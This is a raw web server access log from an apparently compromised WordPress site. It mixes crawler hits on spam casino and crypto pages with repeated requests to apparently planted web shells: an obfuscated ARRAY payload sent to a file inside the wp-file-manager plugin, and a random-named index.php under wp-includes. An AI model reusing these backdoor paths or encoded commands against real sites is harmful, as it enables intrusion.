216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2881 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:15 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading HTTP/2" 200 2907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcomments-pagination%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcomments-pagination HTTP/2" 200 3048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Ftheme-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author HTTP/2" 200 2985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title HTTP/2" 200 2912 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3259 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.14 - - [28/Apr/2026:07:44:18 +0300] "GET /index.php?shop%2Fdoublebreasted%2Fmetallic054255793097.html HTTP/1.1" 200 10378 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.217.81 - - [28/Apr/2026:07:44:18 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 3101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Favatar%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Favatar HTTP/2" 200 2931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author HTTP/2" 200 2991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part%2Ftheme.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part HTTP/2" 200 2909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Feditor-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Farchives%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Farchives HTTP/2" 200 2889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes HTTP/2" 200 3014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part HTTP/2" 200 2914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:20 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fnamespaced%2FFile.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fnamespaced HTTP/2" 200 2925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:19 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fmore%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fmore HTTP/2" 200 3187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:20 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 3448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [28/Apr/2026:07:42:20 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343934302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335313334302q3933353934336161663034383264383638633065366665613964666232336239222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [28/Apr/2026:07:44:20 +0300] "GET /shop/splitted/allyl5868869166.html HTTP/1.1" 200 30340 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [28/Apr/2026:07:44:28 +0300] "GET /shop/interviewing/switchel543588095684.html HTTP/1.1" 200 29081 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
85.208.96.205 - - [28/Apr/2026:07:44:31 +0300] "GET /index.php?shop%2Fdistemper%2Frhetor052566578835.html HTTP/1.1" 200 10332 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:44:34 +0300] "GET /shop/diopsis/telega43546561776.html HTTP/1.1" 200 28422 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
17.246.15.72 - - [28/Apr/2026:07:44:38 +0300] "GET /maximizing-profits-with-jupiter-swap-trading/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/js/crop HTTP/1.1" 200 4368 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.171 - - [28/Apr/2026:07:44:40 +0300] "GET /dexscreener-your-ultimate-tool-for-navigating-dex-markets/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/SimplePie HTTP/1.1" 200 5435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.78.1 - - [28/Apr/2026:07:44:41 +0300] "GET /shop/reedmace/rutilian131718785987.html HTTP/1.1" 200 30372 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:42:42 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343936322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335313336322q3230313462656333663364653835303936653937633330643631303433336463222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
51.195.183.19 - - [28/Apr/2026:07:44:47 +0300] "GET /detail/354393801 HTTP/2" 200 8209 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.78.1 - - [28/Apr/2026:07:44:47 +0300] "GET /shop/fluency/daytime743680960855.html HTTP/1.1" 200 30276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [28/Apr/2026:07:44:53 +0300] "GET /shop/barefoot/sitheman151241391638.html HTTP/1.1" 200 29134 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
17.246.23.194 - - [28/Apr/2026:07:45:03 +0300] "GET /unlocking-the-secrets-of-casino-strategies-for-beginners-2/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/pullquote HTTP/1.1" 500 411 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.216.113.70 - - [28/Apr/2026:07:43:03 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343938332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335313338332q3335323531353561383263343463626531363931613631353230343033336562222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
17.246.19.137 - - [28/Apr/2026:07:45:04 +0300] "GET /unlocking-the-potential-of-atomic-wallet-a-comprehensive-guide/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-cpu-judicatory/custom.css&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-cpu-judicatory HTTP/1.1" 200 27407 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
204.12.208.18 - - [28/Apr/2026:07:44:46 +0300] "GET /wp-includes/adc6eed2/index.php HTTP/1.1" 200 0 "https://miroglu.net/wp-includes/adc6eed2/index.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
66.249.78.2 - - [28/Apr/2026:07:45:06 +0300] "GET /shop/jacchus/flinging504209162029.html HTTP/1.1" 200 18397 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
85.208.96.205 - - [28/Apr/2026:07:45:06 +0300] "GET /index.php?shop%2Fmoulding%2Fpaperwork05136024308.html HTTP/1.1" 200 10379 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:45:13 +0300] "GET /shop/ultimation/lateritious373947630275.html HTTP/1.1" 200 29855 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
17.241.75.20 - - [28/Apr/2026:07:45:20 +0300] "GET /discover-tronscan-your-guide-to-blockchain-insights/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/languages/wp-file-manager-pt_PT.po&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/languages HTTP/1.1" 200 28298 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [28/Apr/2026:07:45:22 +0300] "GET /shop/cooperation/tersanctus922035991923.html HTTP/1.1" 200 28415 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
204.12.208.18 - - [28/Apr/2026:07:45:06 +0300] "GET /wp-includes/adc6eed2/index.php HTTP/1.1" 200 0 "https://miroglu.net/wp-includes/adc6eed2/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
185.216.113.70 - - [28/Apr/2026:07:43:25 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335353030352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335313430352q6462623936383765633237346430363435326334636438643961663738326637222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [28/Apr/2026:07:45:30 +0300] "GET /shop/almanac/propasser112272699946.html HTTP/1.1" 200 29644 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [28/Apr/2026:07:45:34 +0300] "GET /shop/wetbird/accusable471577958555.html HTTP/1.1" 200 19136 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fread-more%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fread-more HTTP/2" 200 2937 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2973 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnextpage%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnextpage HTTP/2" 200 3182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fimg%2Fflags.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fimg HTTP/2" 200 2876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 3312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flist%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flist HTTP/2" 200 3491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fspacer%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fspacer HTTP/2" 200 3152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title HTTP/2" 200 2915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:35 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Flib%2Fnamespaced.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Flib HTTP/2" 200 3454 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
